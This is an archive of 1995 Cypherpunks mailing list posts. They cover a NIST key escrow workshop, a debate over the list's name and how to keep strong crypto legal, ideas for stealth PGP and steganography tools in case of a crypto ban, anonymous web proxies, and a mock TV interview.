Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 17 Sep 95 15:46:06 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: "Attachments"
In-Reply-To: <ac81e3df200210046fa3@[205.199.118.202]>
Message-ID: <9509172245.AA20150@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May the Luddite ;) writes:
[in response to Michael Shields' application/pgp message]
> Why do people keep sending "attachments"?
> 
> This was just a text article, and not an application (program), so why was
> it included as an "attachment"?

It's useful for those of us with MIME-enabled mailers, appropriately
configured -- PGP is automatically launched to check the signature.

It's not useful for others on the list, AFAIK.

Pretty please, let's not have another MIME war; I think we drove Amanda
Walker away permanently with the last one.

Followups directed somewhere other than cypherpunks@toad.com.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Sun, 17 Sep 95 16:47:09 PDT
To: Steven Levy <pcw@access.digex.net>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <v02130501ac814d566452@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:36 pm 9/16/95, Steven Levy wrote:

>>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>>is curiosity." 
>
>It may not be a crime, but it's not nice to steal a title.

I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appeareance of the author of the identically named book?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 17 Sep 95 15:55:14 PDT
To: cypherpunks@toad.com
Subject: Friday's NIST Key Escrow FIPS Workshop
Message-ID: <Pine.SUN.3.91.950917182201.10484D-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



I went to the NIST "Developing Key Escrow Encryption Standards Workshop" 
held in Gaithersburg, MD on Sept. 15, 1995.  It turns out I know the guy
who was running the conference so I knew I couldn't miss it...and I knew I
had to wear my Cypherpunks t-shirt to show the flag (and it stood out, as
there were few without suits there). I got to meet Dorothy Denning for the
first time.  I was mentioning how government key-escrow doesn't sound too
bad to some in the libertarian/cypherpunk world, say for instance to
ensure FOIA requests are not encrypted away.  She said that would never be
a problem, just getting the government to give you FOIA documents in the
first place is the problem. 

In a nutshell, this was a conference to begin work on a FIPS for software 
key encryption escrow.  Industry people there felt that a FIPS would be a 
great way to standardize key escrow for data recovery.  However, except 
for one guy at IBM who said they tap employees phones alot, most industry 
people felt that it was not needed for tapping their real-time 
communications.  There was a lot of talk from government people about the 
need for Law Enforcement to get access to encrypted real-time 
communication between government employees.  This, to say the least, 
squicked many attendees, and there seemed to be much tension between the 
sides on that issue.

I asked a couple of industry people and privacy advocates the question "Am
I just paranoid, or is this FIPS a trial balloon for mandated civillian
key escrow?"  I got many "yes" answers.  I also heard the occasional "this
sounds like son-of-clipper" comments in the breakout groups. 

One noteworthy point is that RSA sent in a position paper to try to get 
the Digital Signature Standard replaced by RSA signatures for inclusion 
in key escrow FIPS due to its "virtual non-availability in commercial 
products," and noted that the US Govt. has free use of RSA sigs.

Another noteworthy point is that NIST made clear that the key escrow FIPS 
should _not_ involve SECRET algorithms.  

The Workshop consisted of a discussion of goals and objectives by Ray
Kammer (Deputy Director, NIST) and some initial thoughts on standards
development by Miles Smid (NIST).  Here is the gist of the overhead
slides: 

The Goals of the workshop were based on the August 17 announcement by the
Administration to allow for exportability of 64-bit software key escrow
encryption, plans to allow Federal agencies to use Escrowed Encryption
Standards compliant hardware devices for data communications, and the
development of a FIPS for key escrow, implementable in software.  This
escrow FIPS would be used by Federal agencies in conjunction with
FIPS-approved encryption techniques.  This workshop was held to help 
begin the FIPS development.  The workshop goals included 1) Providing 
input to the govt. on drafting a software key escrow encryption standard; 
2) Helping govt. to identify additional policy and technical issues that 
need to be addressed and 3) providing the govt. with thoughts on drafting 
and follow-up

The FIPS process involves developing the draft FIPS, a 90 day comment 
period, then addressing comments, and then it goes to the Secretary of 
Commerce for signature, and becomes effective six months after the 
signature.  

The purpose of the New Escrow FIPS is to foster a wider use of escrow 
technology...this means: no requirement for SECRET algorithms, software 
and hardware implementations, and exportability.  It also will provide a 
government validation of escrow systems meeting the 
standard...theoretically allowing for security, integrity, and availability.

Threats examined included compromise (unauthorized disclosure of keys and 
data recovery), and denial of service (modification or loss of keys, use 
of bogus recovery fields, and improper system operation).

The FIPS will provide common formats and procedures which will facilitate 
data recovery and lower cost.  Applicability of the FIPS will include the 
US Govt. and contractors.  Applications include both stored and 
transmitted data.  Encryption algorithms must be FIPS approved.  And 
finally desirable features include: auditing, configuration control, 
backup capability, and efficiency.

The questions asked to the breakout groups included:

1) Is a standard interface for the release of keys desirable?
2) What documentation is required?
3) How will operational procedures be developed?
4) How will conformance be validated?
5) Will security be evaluated?  If so, under what criteria and by whom?
6) How will configuration control be maintained?
7) Are new FIPS-approved algorithms necessary?
8) Should escrowing be built into the Public Key Infracstructure?
9) Is a standard escrow system identification field needed?
10) Is split knowledge required?
11) Do systems which permit data to be encrypted for both storage and 
transmission need to provide for both kinds of escrow?
12) Does the government require special features (2-hour access, 
continuous real-time decryption, etc.)?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 16:21:04 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <Pine.SUN.3.91.950917183137.17849B-100000@polaris.mindport.net>
Message-ID: <199509172320.TAA28220@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> > > Some months ago I called for advanced stego and stealth PGP as well as 
> > > larger keys in the event we all had to go "into the crypto closet" for a 
> > > time.
> > 
> > > I call for them again.

> On Sat, 16 Sep 1995, Greg Broiles wrote:
> > (I've been "calling for" a big house with a hot tub for years now.
> > Still no progress. I'll let you know if it works out.)

Black Unicorn writes:
> Cute, but that's about all.

I think the problem is that those of us in a position to build them
don't really believe that they will solve the problem and thus are
spending our time on other matters.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 16:23:21 PDT
To: "David C. Lambert" <dcl@panix.com>
Subject: Re: CYPHERPUNK considered harmful
In-Reply-To: <199509171657.MAA26446@panix.com>
Message-ID: <Pine.SUN.3.91.950917184519.17849D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 17 Sep 1995, David C. Lambert wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Black Unicorn <unicorn@polaris.mindport.net> wrote:
> > On Fri, 15 Sep 1995, David C. Lambert wrote:
> >
> > > BTW, I'm not for changing the name of the list, but I do see the logic
> > > in a more establishment-friendly name to use when lobbying the public.
> > 
> > Distrubute [sic] watered down cypherpunk "teachings" in more benign forms
 which 
> > hide their true (Ohhh! Scary!) potential in an effort to make them commonly 
> > acceptable to joe sixpack.
> 
> I believe you misstate the point that people are trying to make.
> 
> I haven't seen anyone advocating the "watering down" of any so-called
> "teachings" to "hide" any "true potential".  The only thing that people
> have mentioned is that some of the less clueful out there have a knee
> jerk response to the name "cypherpunk".  That's all.

I don't believe you can have one without the other.  Tell me someone who 
is sensitive enough to be offended by the term "cypherpunk" won't be 
alarmed at concepts like crypto-anarchy.


> 
> > Can't we all see what road this leads down?
> 
> No.  Please enlighten us.
>

When you begin compromising to meet the public sentiment you end up 
aiming for the middle.  "He who builds on the people builds on mud."  I 
believe this especially true in the United States.  The general 
population has no tolerance/time/interest in the deeper issues involved 
here, and are much more apt to bow to the "law and order" arguments made 
by the various political entities here.  These are emotional arguments to 
which Joe Sixpack is particularly open.  Enter the four horsemen.

I believe working to recruit "the people" and lobby "the leaders" to 
embrace the ramification of free and strong crypto is a losing game.  My 
money in information futures is going into "yes" certificates on the 
question of "Unescrowed Strong Crypto Banned in U.S. by 2000."


> > At the risk of politicizing the issue, I wouldn't be the first to call this 
> > "left-speak" or "term-sanitizing."
> 
> And this matters because...?
>


The fact that you need this question answered does more to rebuke your 
position than I ever could.

 
> > Really the core issue is that the citizens of their respective nations 
> > need to either:
> > 
> > 1>  See cryptography for the important individual rights issue that it
> > is and latch on to the basic desire for free and unmonitored commerce and 
> > exchange without censorship or observation.
> > 
> > or
> > 
> > 2>  Decide that they are not interested in the issues because these 
> > issues are too radical, or simply because their own political ideas
> > fall left (or statist) of this spectrum.
> 
> What exactly is it that you feel "the citizens of their respective
> nations" are doing right now, if not this?

Be real.  What percentage of [insert nation here]'s citizens would be 
able to discuss strong encryption with anything more than a comic book 
understanding?

i.e., the answer to your question is "mostly nothing."

> > in the end I 
> > don't care if every joe sixpack on the planet uses real crypto, just so
> > long as those I am to conduct commerce (of data or goods) with do.
> 
> If this is the case, then I'm at a loss to understand how you fail to see
> the merit in a "term-sanitizing", as you put it, in order to make the use
> of strong crypto desired and required by Joe Sixpack.

You're error is in assuming Joe Sixpack desires or thinks he requires strong 
crypto.

  How do you expect
> the legality of string crypto to survive unless Joe and his friends exert
> political pressure to keep it alive?

I don't expect its legality to survive in the United States, nor do I 
expect it to survive despite "political pressure" (that nature of which 
which you conveniently do not idenfify) and finally, I don't expect Joe 
Sixpack, and his friends to exert any (undefined) political pressure- or care.

If people want to try and organize a crypto awareness program, fine.
If people want to try and organize a crypto propoganda program, count me out.

If you don't understand the difference, you need to study history and 
political science.

If Joe Sixpack can't deal with the core, unsanitized ramifications of 
strong crypto, Joe Sixpack isn't ready to have strong crypto.  This is, 
in my view, realism, and intellectual evolution in action.  If strong 
crypto is the advantage I suspect it will be, then those nations which 
use it will endow its citizens with those significant advantages, 
hopefully to the disadvantage of the banning nations.  With any luck, 
this will result in the eventual lack of world/market infulence of 
crypto-ignorant Joe Sixpacks.  This in my view is "a good thing."
I would like the United States to be pro-crypto, but I'm not sure I give 
the country and its current political system as a whole that much credit.

> Isn't it obvious that unless this
> happens, that strong (unescrowed) crypto is on the path to being outlawed
> (at least in the US, and several other countries)?
> 
> > The final judgement will be in the advantage of velocity and security of 
> > transactions and the wealth that this "allocates" to those wise enough to 
> > adopt crypto exchange systems.  Evolution in action.  If this makes me 
> > elitist, so be it.
> 
> Elitist or not, this is beside the point.

No, it is exactly the point.

> People are bringing up political
> and rhetorical concerns because they feel that political and persuasive
> methods are required *right now* in order to preserve the *legality* of 
> strong crypto.

And I believe them a waste of time because I feel that political and 
persuasive methods are useless *right now* or in the *foreseeable future*.

The only thing that will stop this legislation will be a sudden awakening 
of the American People to freedom of speech in the face of an offered and 
vague promise of "security."  (Read: Good Luck)

The FBI is screaming that strong crypto is nasty stuff to the Executive.  
Certainly the intelligence agencies are doing the same.
The Executive is going to support if not outright push through a key 
forfeiture bill, and about all I can see standing in the way will be 
cost- which in this bill is going to be small.

> I only care about whether Joe Sixpack wants strong crypto
> because if I can't persuade him that he does, he won't help me keep it
> legal in my country of residence.

So if you are so intouch with Joe Sixpack, what does he think?  Do you 
have some evidence to suggest that there is any widespread awareness of 
the issues among Joe and Jane?  Surveys?  Studies?  Anything?

Go out on the street and ask 10 random people.  Hell, ask 10 
intellectuals not in the computer science field.  I think your level of 
disillusion will approach mine, and if not, then I do not give your 
powers of observation much credit.

>  Once it's legality seems safe(r) from
> attack, he can go on using rot13 for all I care.

I think you have a long wait.

Part of the entire issue here is securing your own privacy rather than 
letting the government do it for you.  By waiting for someone to TELL 
YOU that you are now ALLOWED to secure your own privacy, why are you any 
better than he who doesn't use strong crypto?  Instead you should, while 
perhaps allocate some effort to political concerns, be working to 
propogate crypto systems which are untraceable, do not bear the 
recipiants key identifier in each message, and otherwise able to endure a 
crypto "Dark Age" which I see right around the corner here.

In other words:

Secure it yourself.  Privacy comes to you only if you secure it 
yourself.  If you believe that political action is the way to do this, be 
my guest- I happen to think you are wasting your time.  Time will judge 
the winner of this debate in any event.  I hope I am wrong, I expect I am 
not.

> 
> David C. Lambert
> dcl@panix.com
> (finger for PGP public key)
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
[...]
> -----END PGP SIGNATURE-----
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 17 Sep 95 16:25:53 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <199509172325.TAA22254@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by unicorn@polaris.mindport.net (Black 
Unicorn) on Sun, 17 Sep  6:39 PM


>If some other 'punks want to get together and fund such 
>projects, I will participate.  However, putting the 
>burden of financing this venture (which will have no 
>immediate economic return, as I will support no venture 
>which does not result in fully public software) 


What are the prospects of privacy-enhancing programing funded 
by contributors for non-commercial, non-governmental, "fully 
public software?" I would tithe, modestly but durably, to such 
work if I believed the promise. They call me Ishmael Sixpack.


John Gilmore's (and others'?) underwriting toad is impressive. 
Along with the voluntary (?) effort of Hugh Daniels (and 
others, I don't know how toad survives).


What else might be done cypherpunk-wise if material resources 
were available? And under what conditions and arrangements? The 
discussion of Mixmaster commercialization is instructive. And 
Julf's and the other remailers survivability and longevity in 
the face of attacks.


How could the contributions be made without contaminating the 
product? No joke.


Or, are only individually initiated and self-funded programs 
trustworthy, when all is said and done? And no planned program 
as rewarding as the eclectic irregulated.


And bartering and bickering and rending and mending the only 
reputable method of exchange of the tumultuous souk.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 17 Sep 95 16:37:02 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.)
In-Reply-To: <20045.9509171928@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.SUN.3.91.950917192456.17849E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information

On Sun, 17 Sep 1995 aba@atlas.ex.ac.uk wrote:

> 
> Black Unicorn <unicorn@polaris.mindport.net> writes:
> >
> > 3. Unescrowed crypto banned, with advanced stego, panic passwords, 
> > stealth PGP, incorporated remailers all across international borders 
> > making offenders impossible to identify or catch.
> > 
> > [...] I believe the goal is to propogate crypto far enough to at
> > least have a salient "underground" participants.
> > 
> > Some months ago I called for advanced stego and stealth PGP as well
> > as larger keys in the event we all had to go "into the crypto
> > closet" for a time.
> > 
> > I call for them again.
> 
> Guess you're saying that a future underground cypherpunk group is
> going to need tools to continue if the US plummets into cryptographic
> darkness.  And you'd like to see these tools available now, as it will
> be difficult to distribute, and set up if the big ban is already on
> us.  A pre-emptive safety precaution in the event that it happens.

Precisely.  Thank you.

> 
> So what threat model do you envisage tools being needed to withstand?
>

Traffic analysis, jurisdiction, detection of encrypted data in stego'd 
files.

I believe the basic problem will be one of avoiding detection and the 
ability to piggyback harmless looking files on "approved" encryption.

In the event your encrypted message were detected, it would be nice if it 
didn't announce its intended destination via a public key header.

I also believe that excessively large keys should be incorporated 
(2048/4096 bit RSA and 256 bit IDEA like encryption perhaps) to extend the
likely useful life of cyphers which will be difficult to distribute later.

I also would like to see applications which permit the user to select the 
from among a few types of encryption, in the event one is found to be broken.

> A couple of the things you list are realisable with little effort, one
> is a PGP with large keys, I am using a doctored to go to 16k keys

[description of availability]

> Adding stealth features to PGP, or even as standalone, aren't hard
> either.  I've been trying to add Hal's improved stealth algorithm to
> Henry Hastur's stealth program.  It's basically finished, except for
> the problem that I am unsure about the security of the construct:

Excellent!

> So that's big key PGP, and stealth PGP.  I'm presuming most people
> figure 128 bit IDEA is suitably unassailable,

I'm pretty confident in it, but I would like to see some others about.

> What are views about creating Yet Another version of PGP.  I've read a
> few discussions of this kind of thing in the past on alt.security.pgp,
> and most people were against it.  But I think some useful things could
> come out of it.


I think one of the big hold ups is the wait for PGP 3.0

> 
> The other problem is working with pgp2.x when there is a version 3.0
> being worked on, not sure what stage 3.0 is at, any coding.. perhaps
> if a stealth capable pgp2.x was worked on, and a few features
> demonstrated, the 3.0 folks would be willing to take a look at it to
> evaluate the features for possible version 3.0 inclusion.

Exactly.

> Good stego tools are the other main problem.

I concur.

> 
> My understanding is that all of the stego programs to date do it by
> just ripping out the LSB of an audio or graphic image, and replacing
> that with the bits from a message with a stealthed message.
>

As I understood the current implementation, stego is fairly easy to sniff 
out.  Am I mistaken in this?

> Sending masses of pictures around is kind of suspicious tho, I mean
> several a day, each freshly scanned from what?  I guess if video
> conferencing gets here, it would be fun to add the stego into that
> noisy stream, same for internet phone.

Perhaps, but hardly as suspicious as sending naked random data.  I think 
given hard to sniff stego, and the nationwide bandwidth, this is a non-issue.

> Text stego, with bits hidden in the entropy of english text seems a
> harder objective, but a useful one.

Indeed.

> I'm presuming that plausible deniability, and facilities for anonimity
> are essentials.  How does one go about doing that?  Using newsgroups
> to carry on a two level communication might be a good way of
> maintaining plausible deniability.  Either a stego interface to
> remailers in other countries, so that the stego gateway to remailers
> scans it's newspool, decrypts messages addressed to it, and forwards
> that off to the anon remailers.  The outcome could be a further text
> or graphics stegoed message for posting to a suitably high noise news
> group.  The recipient is also scanning his news spool for stego
> messages addressed to him.
> 
> Sounds feasible.  Perhaps a proof of concept would be easy to knock
> up, if a place holder is inserted for the 'good text stego' program
> should go.  There was a 'texto' posted a while ago which did something
> suitable.
> 
> Adam

I believe all these to be in everyone's best interest.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 17 Sep 95 16:30:31 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <ac81f7431f02100449e3@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


>>I saw "Hackers" yesterday. It's not bad and its political sensibility is
>>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
>>is curiosity."
>
>It may not be a crime, but it's not nice to steal a title.

Well, what do you think of my latest predicament. My first book, "Agents
Unleashed" will be retitled "Agents At Large" because SAMS, a division of
Viacom, considers any title ending with the word "unleashed" to be an
infringement of their tradedress. They came up with enough legal
mumbo-jumbo about trademark to scare my publisher into changing it.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 17 Sep 95 16:39:14 PDT
To: perry@piermont.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <ac82633800021004becb@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


in" -- this doesn't mean madonna stole it, does it?
>
>I'm reminded of the time a few years a go that there were two films in
>release simultaneously named "Black Rain", and, most oddly, both took
>place in Japan.
>
>Perry

This is not as odd as you might think once you realize that the rain that
fell after the atomic bombing was black.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 17 Sep 95 20:24:13 PDT
To: hughes@remailer.net, gnu, cypherpunks
Subject: Central Banking for the 21st Century -- Thurs 28Sep, San Fran
Message-ID: <9509180324.AA29978@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The Pacific Research Forum, a local libertarian economics group, is
sponsoring a talk by Dr. Jerry L. Jordan, president of the Federal
Reserve Bank of Cleveland and Dr. Donald T. Brash, governor of the
Reserve Bank of New Zealand, with moderator Dr. William S. Haraf,
director of public policy for BofA.

The forum is 3:30-5PM at the Banker's Club, 555 California St, 51st
floor, SF.  The reception is 5PM-6PM.  It costs $25; RSVP to Cindy
Sparks at +1 415 989 0833.

"Central banks were originally intended to bring price stability to a
paper-based bank payments system.  But what will be the proper role of
a central bank in the rapidly approaching era of digital money?  What
happens to monetary policy, supervision and regulation, as well as
financial services such as clearning checks, when electronically-
initiated debits and credits become the transaction of choice?"

..."Dr. Jordan predicts that ... the proliferation of digital money will
provide new challenges for central banks laboring to provide stable money."

I'll probably see you there...
--
John Gilmore                                    gnu@toad.com  --  gnu@eff.org
        Don't introduce that Tsutomu to your girlfriend.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sun, 17 Sep 95 13:28:04 PDT
To: cypherpunks@toad.com
Subject: cypherpunks as a newsgroup
Message-ID: <m0suQJV-000HYvC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 17 Sep 95 12:28:43 PDT
To: unicorn@polaris.mindport.net
Subject: planning for life during the crypto night (was Re: CYPHERPUNK considered harmful.)
Message-ID: <20045.9509171928@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn <unicorn@polaris.mindport.net> writes:
>
> 3. Unescrowed crypto banned, with advanced stego, panic passwords, 
> stealth PGP, incorporated remailers all across international borders 
> making offenders impossible to identify or catch.
> 
> [...] I believe the goal is to propogate crypto far enough to at
> least have a salient "underground" participants.
> 
> Some months ago I called for advanced stego and stealth PGP as well
> as larger keys in the event we all had to go "into the crypto
> closet" for a time.
> 
> I call for them again.

Guess you're saying that a future underground cypherpunk group is
going to need tools to continue if the US plummets into cryptographic
darkness.  And you'd like to see these tools available now, as it will
be difficult to distribute, and set up if the big ban is already on
us.  A pre-emptive safety precaution in the event that it happens.

So what threat model do you envisage tools being needed to withstand?

A couple of the things you list are realisable with little effort, one
is a PGP with large keys, I am using a doctored to go to 16k keys (I
did this to amuse myself with getting timings for how long encrypt /
decrypt & keygen take for varying key sizes).  The patch is small, and
easy to figure out, just a couple of #ifdefs, various people posted
their patches to do this to alt.security.pgp some time ago.  I think
there was at least one patched version of PGP distributed
(unofficially of course - PGPs largest allowed key size being 2048
bits), though I don't have any URLs for such a beast.  Part of the
problem is people seem to frown on distributing PGPs with larger keys,
or alternate versions of PGP, due to version control issues, and such.
Technically easy to do tho.

Adding stealth features to PGP, or even as standalone, aren't hard
either.  I've been trying to add Hal's improved stealth algorithm to
Henry Hastur's stealth program.  It's basically finished, except for
the problem that I am unsure about the security of the construct:

	x' = f(MD5(x)) * N + x

where 0 < x < N
and   0 < x' < M where M is a power of 2, and M > 2^64 * N
and f is just a scaling function

If that is secure I'd be happy to release an updated version of
stealth, but without assurance, it is necessary to include random
numbers, and the best way I see to achieve that is to build it in to
PGP, and use PGP's ran no utils directly.

If you're talking about a different version of PGP, perhaps this
wouldn't be a big deal anyway.

So that's big key PGP, and stealth PGP.  I'm presuming most people
figure 128 bit IDEA is suitably unassailable, but RSA keys are a
moving target, and less predictable due to improvements in factoring
algorithms.  Already people are talking about an academic RSA129 like
attempt on a 512 bit PGP key.

What are views about creating Yet Another version of PGP.  I've read a
few discussions of this kind of thing in the past on alt.security.pgp,
and most people were against it.  But I think some useful things could
come out of it.

The other problem is working with pgp2.x when there is a version 3.0
being worked on, not sure what stage 3.0 is at, any coding.. perhaps
if a stealth capable pgp2.x was worked on, and a few features
demonstrated, the 3.0 folks would be willing to take a look at it to
evaluate the features for possible version 3.0 inclusion.

Just don't want to go do a of work, and then get a polite cease and
desist from those with interests in managing the version control of
PGP.

Good stego tools are the other main problem.

My understanding is that all of the stego programs to date do it by
just ripping out the LSB of an audio or graphic image, and replacing
that with the bits from a message with a stealthed message.

Sending masses of pictures around is kind of suspicious tho, I mean
several a day, each freshly scanned from what?  I guess if video
conferencing gets here, it would be fun to add the stego into that
noisy stream, same for internet phone.

Text stego, with bits hidden in the entropy of english text seems a
harder objective, but a useful one.

I'm presuming that plausible deniability, and facilities for anonimity
are essentials.  How does one go about doing that?  Using newsgroups
to carry on a two level communication might be a good way of
maintaining plausible deniability.  Either a stego interface to
remailers in other countries, so that the stego gateway to remailers
scans it's newspool, decrypts messages addressed to it, and forwards
that off to the anon remailers.  The outcome could be a further text
or graphics stegoed message for posting to a suitably high noise news
group.  The recipient is also scanning his news spool for stego
messages addressed to him.

Sounds feasible.  Perhaps a proof of concept would be easy to knock
up, if a place holder is inserted for the 'good text stego' program
should go.  There was a 'texto' posted a while ago which did something
suitable.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s675570@aix2.uottawa.ca
Date: Sun, 17 Sep 95 17:37:11 PDT
To: cypherpunks@toad.com
Subject: Joe Sixpack and his TV
Message-ID: <Pine.3.89.9509172041.B83388-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


If Mr. & Mrs J. Sixpack seem to know zilch at present about strong or any 
other other kind of crypto, would it maybe, possibly have to do with a lack
of exposure to it on the soap operas of their favorite media, ie TV? Hmmm.

The general level of paranoia on X-Files (100 milion viewers all over the 
world, rabid internet following) is even higher than on this list, and 
the usual discussions on this list would read like a free vacation to their
scriptwriters and researchers. Anyone have any scriptwriting skills?
100 million potential subscribers to toad are stake... (Yes I guess then
we'd have to move to usenet distribution. But think how entertaining our
flames wars would become. Yes I'm definitely calling for it, and the big 
house with the hot tub would be nice too. Only half joking. Honestly though, 
anyone want to find out their email addreses and send out a gratis 
subscription to toad? A script would be nice too. It's better exposure 
than five seconds of Tim with Connie Chung.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 17 Sep 95 17:58:26 PDT
To: cypherpunks@toad.com
Subject: Re: Joe Sixpack and his TV
Message-ID: <v02120d01ac8271596519@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>(...It's better exposure
>than five seconds of Tim with Connie Chung.)

Connie: "So it's really true that you're an anarchist? That you believe that
         semi-*automatic weapons* and strong *cryptography* should be *freely*
         available to *everyone*? and that strong cryptography on a *public*
         network like the *internet* will bring about the collapse of nation
         states all over the *world*?"

Tim:    "Yes."

Connie: "But, what about *democracy*? What the will of the *people*?"

Tim:    "What about them?"

A little more than 5 seconds, but I believe that captures her inflection
pretty nicely, don't you think?

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew V. Kovalev <Andrew.V.Kovalev@jet.msk.su>
Date: Sun, 17 Sep 95 10:06:38 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymous WWW proxies
In-Reply-To: <9509171010.AA11011@hplyot.obspm.fr>
Message-ID: <m0suNA5-0000zSC@jet.msk.su>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Laurent Demailly wrote:
> 
> Aleph One writes:
>  > Whats the problem of using CERN in proxy mode? You can even set it up do 
>  > to chaining.
> The chaining is not dynamic (but its is maybe patcheable) ? 
> I don't think there is support for encryption (ssl patches maybe?) ?
> Also, CERN httpd is a huge thing, maybe some smaller proxy would
> do... 
> My development is/could be based on my httpd, but simplified... I'll
> have a look at standalone already existing proxies before reinventing
> the wheel...
> 

I am almost sure that new TIS http-gw will do. Especially if ssl will be
added by some kind soul..

				avk

- -- 
- ---
  \/\/\/ Andrew.V.Kovalev@jet.msk.su     +7-095-973-4848 office 
 Security is like defecation - unpleasant, but alternatives are worse.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQBFAwUBMFxVZvLk60Co0vEHAQHYTQF+OWKil3l+o1gGQNw4jpWseQL80Fi9YwRc
ydyRvfkmnFn+5hhpQXLVSlS+WwyWNt1G
=TYGa
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 17 Sep 95 18:12:24 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Joe Sixpack and his TV
In-Reply-To: <v02120d01ac8271596519@[199.0.65.105]>
Message-ID: <199509180112.VAA28385@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



It also captures Tim nicely. I'll point out, though, that exchanges
like that can be handled properly or badly. Doing it right means
answering truthfully but in a way that explains your position rather
than alienating the audiance.

When you have time to answer questions like that (TV isn't a medium
suitable for this) the right way to answer the last one is to do
something like referencing Thoreau. By the way, I like the opening of
Civil Disobediance so much I thought I'd post it.

         I heartily accept the  motto, "That government is  best
    which governs least"; and I should  like to see it acted  up
    to more rapidly and systematically.  Carried out, it finally
    amounts to this, which  also I believe--"That government  is
    best which governs not  at all"; and  when men are  prepared
    for it, that will be the  kind of government which the  will
    have.

Perry

Robert Hettinga writes:
> >(...It's better exposure
> >than five seconds of Tim with Connie Chung.)
> 
> Connie: "So it's really true that you're an anarchist? That you believe that
>          semi-*automatic weapons* and strong *cryptography* should
>          be *freely* available to *everyone*? and that strong
>          cryptography on a *public* network like the *internet* will
>          bring about the collapse of nation states all over the
>          *world*?"
> 
> Tim:    "Yes."
> 
> Connie: "But, what about *democracy*? What the will of the *people*?"
> 
> Tim:    "What about them?"
> 
